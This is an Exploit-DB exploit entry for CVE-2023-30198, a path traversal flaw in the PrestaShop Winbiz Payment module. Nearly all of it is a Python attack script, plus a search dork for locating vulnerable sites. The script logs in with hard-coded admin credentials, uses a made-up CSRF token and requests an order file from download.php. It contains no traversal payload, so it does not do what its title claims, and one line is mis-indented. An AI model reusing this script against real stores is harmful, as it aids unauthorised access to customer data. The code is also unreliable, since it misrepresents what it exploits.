PrestaShop Winbiz Payment module – Improper Limitation of a Pathname to a Restricted Directory

• Exploit Database
• 17 阅读

• 作者： Amirhossein Bahramizadeh
  日期： 2023-06-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51545/

• # Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
  # Date: 2023-06-20
  # Dork: /modules/winbizpayment/downloads/download.php
  # country: Iran
  # Exploit Author: Amirhossein Bahramizadeh
  # Category : webapps
  # Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
  # Version: 17.1.3 (REQUIRED)
  # Tested on: Windows/Linux
  # CVE : CVE-2023-30198
  
  import requests
  import string
  import random
  
  # The base URL of the vulnerable site
  base_url = "http://example.com"
  
  # The URL of the login page
  login_url = base_url + "/authentication.php"
  
  # The username and password for the admin account
  username = "admin"
  password = "password123"
  
  # The URL of the vulnerable download.php file
  download_url = base_url + "/modules/winbizpayment/downloads/download.php"
  
  # The ID of the order to download
  order_id = 1234
  
  # The path to save the downloaded file
  file_path = "/tmp/order_%d.pdf" % order_id
  
  # The session cookies to use for the requests
  session_cookies = None
  
  # Generate a random string for the CSRF token
  csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
  
  # Send a POST request to the login page to authenticate as the admin user
  login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
  session = requests.Session()
  response = session.post(login_url, data=login_data)
  
  # Save the session cookies for future requests
  session_cookies = session.cookies.get_dict()
  
  # Generate a random string for the CSRF token
  csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
  
  # Send a POST request to the download.php file to download the order PDF
  download_data = {"id_order": order_id, "csrf_token": csrf_token}
  response = session.post(download_url, cookies=session_cookies, data=download_data)
  
  # Save the downloaded file to disk
  with open(file_path, "wb") as f:
  f.write(response.content)
  
  # Print a message indicating that the file has been downloaded
  print("File downloaded to %s" % file_path)